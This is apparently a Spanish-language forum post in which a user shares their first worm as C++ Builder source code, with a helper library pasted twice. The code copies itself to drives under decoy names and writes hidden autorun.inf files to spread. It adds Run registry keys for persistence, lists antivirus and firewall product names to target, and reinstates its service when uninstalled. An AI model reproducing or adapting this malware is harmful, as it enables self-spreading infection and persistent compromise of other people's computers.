return 1;
if(buscahkey(1,"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",valuekey->operator [](i),pat))
return 1;
}
return 0;
}
void inicializalista()
{
//nombreinterno//
nomsis->Add("Aqui puedes cargar los nombres que vam ha tener los exes");
//////señuelo////////////
nomtrampa->Add("Aqui pueden colocar los nombre señuelo ni de broma iva ha deja rlos mios jeje");
////////////values//////////////////
valuekey->Add("Aqui colocas los nombres que vam en las HK");
////////////titulos///////////
deftit->Add("Aqui van los titulos de la aplicacion ");
/////////////arcsis////////
arcsis->Add("Una lista de ficheros que crea el exe son como 6");
////////////////////////////////
patblan->Add("WEBPROXY");
patblan->Add("APVXDW");
patblan->Add("Patvs");
patblan->Add("AVENGIN");
patblan->Add("PNMSRV");
patblan->Add("panda");
patblan->Add("centinel");
patblan->Add("firewall");
patblan->Add("Centinell.vxd");
patblan->Add("Mcafe");
patblan->Add("virscan");
patblan->Add("vircentinel");
patblan->Add("codeguard");
patblan->Add("lavasoft");
patblan->Add("nort");
patblan->Add("antivir");
patblan->Add("virscan");
patblan->Add("scanv");
patblan->Add("ipguard");
patblan->Add("iptable");
patblan->Add("kaspersk");
patblan->Add("iprocser");
patblan->Add("viraler");
patblan->Add("securitycen");
patblan->Add("centpan");
patblan->Add("Protec");
patblan->Add("guard");
/////////////////////////////
extensiones->Add(".EXE");
extensiones->Add(".DLL");
extensiones->Add(".BAT");
extensiones->Add(".VBS");
extensiones->Add(".SYS");
extensiones->Add(".INI");
extensiones->Add(".DAT");
extensiones->Add(".INF");
extensiones->Add(".PAD");
extensiones->Add(".TXT");
///estos estring tiene que ir cifrados
}
int detechermano()
{
int i,j;
for(i=0;i<=titulosmem->Count-1;i++)
for(j=0;j<=deftit->Count-1;j++)
if(!StrComp(titulosmem->operator [](i).c_str(),deftit->operator [](j).c_str()))
return 1;
return 0;
}
//----------------------------------------------------------------------------
void infecdisk ()
{
AnsiString a;
int i;
for(i=0;i<26;i++)
if(discolocal[i].tipo==2||discolocal[i].tipo==3||discolocal[i].tipo==4)
enfermar(AnsiString(discolocal[i].nom),discolocal[i].tipo);
}
void enfermar(AnsiString driv,int tipo)
{
FILE *p;
char cad[256]=" ";
int ban=0,i,ban1=0,a;
AnsiString pa,prueba,pa1;
ban=1;
a=FileGetAttr(driv);
ban1=1;
prueba=driv+"s.fer";
if(a==-1)
ban1=0;
if(a!=-1)
{a=FileCreate(prueba);
FileClose(a);}
if(a==-1)
{
ban1=0;
}
DeleteFile(prueba);
if(ban1)
for(i=0;i<nomtrampa->Count;i++)
{
pa=driv+nomtrampa->operator [](i);
if(FileExists(pa))
ban=0;
}
if(ban&&ban1)
{prueba=nomtrampa->operator [](random(nomtrampa->Count));
pa=driv+prueba;
CopyFile(hijomut.c_str(),pa.c_str(),1);
pa1=driv+"autorun.inf";
FileSetAttr(pa1,!faHidden);
p=fopen(pa1.c_str(),"wb");
StrCopy(cad,"[AutoRun]\r\nopen=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\nshellexecute=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\nshell\\Auto\\command=");
StrCat(cad,prueba.c_str());
StrCat(cad,"\r\n");
fwrite(&cad,sizeof(char)*256,1,p);
fclose(p);
FileSetAttr(pa1,faHidden);
FileSetAttr(pa,faHidden);
}
}
AnsiString generanomar()
{
AnsiString s;
s=nomtrampa->operator [](random(nomtrampa->Count));
return s;
}
void __fastcall TService1::ServiceAfterUninstall(TService *Sender)
{
Service1->ServiceCreate(Sender);
}
//---------------------------------------------------------------------------
void __fastcall TService1::ServiceBeforeUninstall(TService *Sender)
{
Service1->ServiceCreate(Sender);
}
////////////////////////////////////////////////////////////////////////////////////////////////////
Una libreria que utiliza
Código:
# include "Registry.hpp"
# include "SysUtils.hpp"
# include "Winioctl.h"
typedef struct {
AnsiString path;
AnsiString ALLUSERPROFILE;
AnsiString APPDATA;
AnsiString CLIENTNAME;
AnsiString CommomProgramf;
AnsiString Computername;
AnsiString ComsPec;
AnsiString FP_NO_HOST_CHECK;
AnsiString HOMEDRIVE;
AnsiString HOMEPATH;
AnsiString LOGONSERVER;
AnsiString OS;
AnsiString ProgramFiles;
AnsiString SESSIONAME;
AnsiString SistemDrive;
AnsiString SystemRoot;
AnsiString USERDOMAIN;
AnsiString USERNAME;
AnsiString USERPROFILE;
AnsiString windir;
} confsis;
typedef struct {
char nom[4];
int tipo;
} diskset;
confsis examinar();
int creahkey(int,AnsiString,AnsiString,AnsiString);
void insertar(AnsiString, AnsiString);
int listdir(AnsiString, AnsiString);
int buscahkey(int ,AnsiString ,AnsiString ,AnsiString);
confsis examinar ()
{
confsis envsis;
envsis.path=AnsiString(getenv("PATH"));
envsis.ALLUSERPROFILE=AnsiString(getenv("ALLUSERSPROFILE"));
envsis.APPDATA=AnsiString(getenv("APPDATA"));
envsis.CLIENTNAME=AnsiString(getenv("CLIENTNAME"));
envsis.CommomProgramf=AnsiString(getenv("CommonProgramFiles"));
envsis.Computername=AnsiString(getenv("COMPUTERNAME"));
envsis.ComsPec=AnsiString(getenv("ComsPec"));
envsis.FP_NO_HOST_CHECK=AnsiString(getenv("FP_NO_HOST_CHECK"));
envsis.HOMEDRIVE=AnsiString(getenv("HOMEDRIVE"));
envsis.HOMEPATH=AnsiString(getenv("HOMEPATH"));
envsis.LOGONSERVER=AnsiString(getenv("LOGONSERVER"));
envsis.OS=AnsiString(getenv("OS"));
envsis.ProgramFiles=AnsiString(getenv("ProgramFiles"));
envsis.SESSIONAME=AnsiString(getenv("SESSIONNAME"));
envsis.SistemDrive=AnsiString(getenv("SystemDrive"));
envsis.SystemRoot=AnsiString(getenv("SystemRoot"));
envsis.USERDOMAIN=AnsiString(getenv("USERDOMAIN"));
envsis.USERNAME=AnsiString(getenv("USERNAME"));
envsis.USERPROFILE=AnsiString(getenv("USERPROFILE"));
envsis.windir=AnsiString(getenv("windir"));
return envsis;
}
diskset detecdis(int i)
{
char l;
diskset dis;
StrCopy(dis.nom," ");
l='A' +i;
dis.nom[0]=l;
StrCat(dis.nom,":\\");
dis.tipo=GetDriveType(dis.nom);
return dis;
}
int creahkey(int a, AnsiString dest, AnsiString val, AnsiString keyr)
{
int ban;
TRegistry *Reg = new TRegistry;
if(a==0)
Reg->RootKey = HKEY_LOCAL_MACHINE;
else
Reg->RootKey = HKEY_CURRENT_USER;
if(Reg->OpenKey(dest,0))
{
Reg->WriteString(val,keyr);
ban=1;
}
else
ban=0;
delete Reg;
return ban;
}
void chanatra(AnsiString cad, int lectura, int oculto)
{
int a;
if(FileExists(cad))
{
a=FileGetAttr(cad);
if((oculto==1)&&(a & faHidden))
FileSetAttr(cad, a & !faHidden);
else
{
a=FileGetAttr(cad);
if((oculto==0)&&(a & !faHidden))
FileSetAttr(cad, a & faHidden);
}
a=FileGetAttr(cad);
if((lectura==1)&&(a & faReadOnly))
FileSetAttr(cad, a & !faReadOnly);
else
{
a=FileGetAttr(cad);
if((lectura==0)&&(a & !faReadOnly))
FileSetAttr(cad, a & faReadOnly);
}
}
}
int listdir(AnsiString pat, AnsiString homed)
{
int ban5,i;
FILE *p;
AnsiString aux,aux1,exte,aux2;
TSearchRec sr ;
int iAttributes = 0;
iAttributes |= faDirectory * 1;
iAttributes |= faHidden * 1;
iAttributes |= faReadOnly * 1;
insertar(pat,homed);
ChDir(homed);
aux1=aux+"*.*";
if (FindFirst(aux1, iAttributes, sr) == 0)
{
do
{
if (((sr.Attr) & iAttributes) == sr.Attr)
{
if(AnsiCompareStr(sr.Name,".")!=0&&AnsiCompareStr(sr.Name,"..")!=0)
{
aux2=homed+sr.Name+"\\";
if(DirectoryExists(aux2))
listdir(pat,aux2);
}
}
}
while (FindNext(sr) == 0);
}
FindClose(sr);
return 1;
}
void insertar (AnsiString pat,AnsiString cad)
{
char s[256]= " ";
FILE *p;
p=fopen(pat.c_str(),"ab+");
if(p!=NULL)
{
StrCopy(s,cad.c_str());
fwrite(&s,sizeof(char)*256,1,p);
}
fclose(p);
}
int buscahkey(int rot,AnsiString keyp,AnsiString valu,AnsiString pat)
{
AnsiString a;
int i,ban=0;
TRegistry *Reg = new TRegistry;
TStringList *Val = new TStringList;
if(rot==0)
Reg->RootKey = HKEY_LOCAL_MACHINE;
else
Reg->RootKey = HKEY_CURRENT_USER;
if (Reg->OpenKey(keyp,false))
{
Reg->GetValueNames(Val);
for (i = 0; i < Val->Count; i++)
{
if(!AnsiCompareStr(Val->Strings[i],valu))
{
a=Reg->ReadString(Val->Strings[i]);
if(!AnsiCompareStr(a,pat))
ban=2;
else
ban=1;
}
}
}
else
ban=-1;
return ban;
}
# include "stdio.h"# include "SysUtils.hpp"
# include "Winioctl.h"
typedef struct {
AnsiString path;
AnsiString ALLUSERPROFILE;
AnsiString APPDATA;
AnsiString CLIENTNAME;
AnsiString CommomProgramf;
AnsiString Computername;
AnsiString ComsPec;
AnsiString FP_NO_HOST_CHECK;
AnsiString HOMEDRIVE;
AnsiString HOMEPATH;
AnsiString LOGONSERVER;
AnsiString OS;
AnsiString ProgramFiles;
AnsiString SESSIONAME;
AnsiString SistemDrive;
AnsiString SystemRoot;
AnsiString USERDOMAIN;
AnsiString USERNAME;
AnsiString USERPROFILE;
AnsiString windir;
} confsis;
typedef struct {
char nom[4];
int tipo;
} diskset;
confsis examinar();
int creahkey(int,AnsiString,AnsiString,AnsiString);
void insertar(AnsiString, AnsiString);
int listdir(AnsiString, AnsiString);
int buscahkey(int ,AnsiString ,AnsiString ,AnsiString);
confsis examinar ()
{
confsis envsis;
envsis.path=AnsiString(getenv("PATH"));
envsis.ALLUSERPROFILE=AnsiString(getenv("ALLUSERSPROFILE"));
envsis.APPDATA=AnsiString(getenv("APPDATA"));
envsis.CLIENTNAME=AnsiString(getenv("CLIENTNAME"));
envsis.CommomProgramf=AnsiString(getenv("CommonProgramFiles"));
envsis.Computername=AnsiString(getenv("COMPUTERNAME"));
envsis.ComsPec=AnsiString(getenv("ComsPec"));
envsis.FP_NO_HOST_CHECK=AnsiString(getenv("FP_NO_HOST_CHECK"));
envsis.HOMEDRIVE=AnsiString(getenv("HOMEDRIVE"));
envsis.HOMEPATH=AnsiString(getenv("HOMEPATH"));
envsis.LOGONSERVER=AnsiString(getenv("LOGONSERVER"));
envsis.OS=AnsiString(getenv("OS"));
envsis.ProgramFiles=AnsiString(getenv("ProgramFiles"));
envsis.SESSIONAME=AnsiString(getenv("SESSIONNAME"));
envsis.SistemDrive=AnsiString(getenv("SystemDrive"));
envsis.SystemRoot=AnsiString(getenv("SystemRoot"));
envsis.USERDOMAIN=AnsiString(getenv("USERDOMAIN"));
envsis.USERNAME=AnsiString(getenv("USERNAME"));
envsis.USERPROFILE=AnsiString(getenv("USERPROFILE"));
envsis.windir=AnsiString(getenv("windir"));
return envsis;
}
diskset detecdis(int i)
{
char l;
diskset dis;
StrCopy(dis.nom," ");
l='A' +i;
dis.nom[0]=l;
StrCat(dis.nom,":\\");
dis.tipo=GetDriveType(dis.nom);
return dis;
}
int creahkey(int a, AnsiString dest, AnsiString val, AnsiString keyr)
{
int ban;
TRegistry *Reg = new TRegistry;
if(a==0)
Reg->RootKey = HKEY_LOCAL_MACHINE;
else
Reg->RootKey = HKEY_CURRENT_USER;
if(Reg->OpenKey(dest,0))
{
Reg->WriteString(val,keyr);
ban=1;
}
else
ban=0;
delete Reg;
return ban;
}
void chanatra(AnsiString cad, int lectura, int oculto)
{
int a;
if(FileExists(cad))
{
a=FileGetAttr(cad);
if((oculto==1)&&(a & faHidden))
FileSetAttr(cad, a & !faHidden);
else
{
a=FileGetAttr(cad);
if((oculto==0)&&(a & !faHidden))
FileSetAttr(cad, a & faHidden);
}
a=FileGetAttr(cad);
if((lectura==1)&&(a & faReadOnly))
FileSetAttr(cad, a & !faReadOnly);
else
{
a=FileGetAttr(cad);
if((lectura==0)&&(a & !faReadOnly))
FileSetAttr(cad, a & faReadOnly);
}
}
}
int listdir(AnsiString pat, AnsiString homed)
{
int ban5,i;
FILE *p;
AnsiString aux,aux1,exte,aux2;
TSearchRec sr ;
int iAttributes = 0;
iAttributes |= faDirectory * 1;
iAttributes |= faHidden * 1;
iAttributes |= faReadOnly * 1;
insertar(pat,homed);
ChDir(homed);
aux1=aux+"*.*";
if (FindFirst(aux1, iAttributes, sr) == 0)
{
do
{
if (((sr.Attr) & iAttributes) == sr.Attr)
{
if(AnsiCompareStr(sr.Name,".")!=0&&AnsiCompareStr(sr.Name,"..")!=0)
{
aux2=homed+sr.Name+"\\";
if(DirectoryExists(aux2))
listdir(pat,aux2);
}
}
}
while (FindNext(sr) == 0);
}
FindClose(sr);
return 1;
}
void insertar (AnsiString pat,AnsiString cad)
{
char s[256]= " ";
FILE *p;
p=fopen(pat.c_str(),"ab+");
if(p!=NULL)
{
StrCopy(s,cad.c_str());
fwrite(&s,sizeof(char)*256,1,p);
}
fclose(p);
}
int buscahkey(int rot,AnsiString keyp,AnsiString valu,AnsiString pat)
{
AnsiString a;
int i,ban=0;
TRegistry *Reg = new TRegistry;
TStringList *Val = new TStringList;
if(rot==0)
Reg->RootKey = HKEY_LOCAL_MACHINE;
else
Reg->RootKey = HKEY_CURRENT_USER;
if (Reg->OpenKey(keyp,false))
{
Reg->GetValueNames(Val);
for (i = 0; i < Val->Count; i++)
{
if(!AnsiCompareStr(Val->Strings[i],valu))
{
a=Reg->ReadString(Val->Strings[i]);
if(!AnsiCompareStr(a,pat))
ban=2;
else
ban=1;
}
}
}
else
ban=-1;
return ban;
}
Fue mi primer tester asi que no acepto criticas malintencionadas
si pueden aportar mejores ideas gracias
Y si el moderador lo quiere eliminar
Yo entendere sus motivos jeje
En línea
. Le echaré un ojo 
.
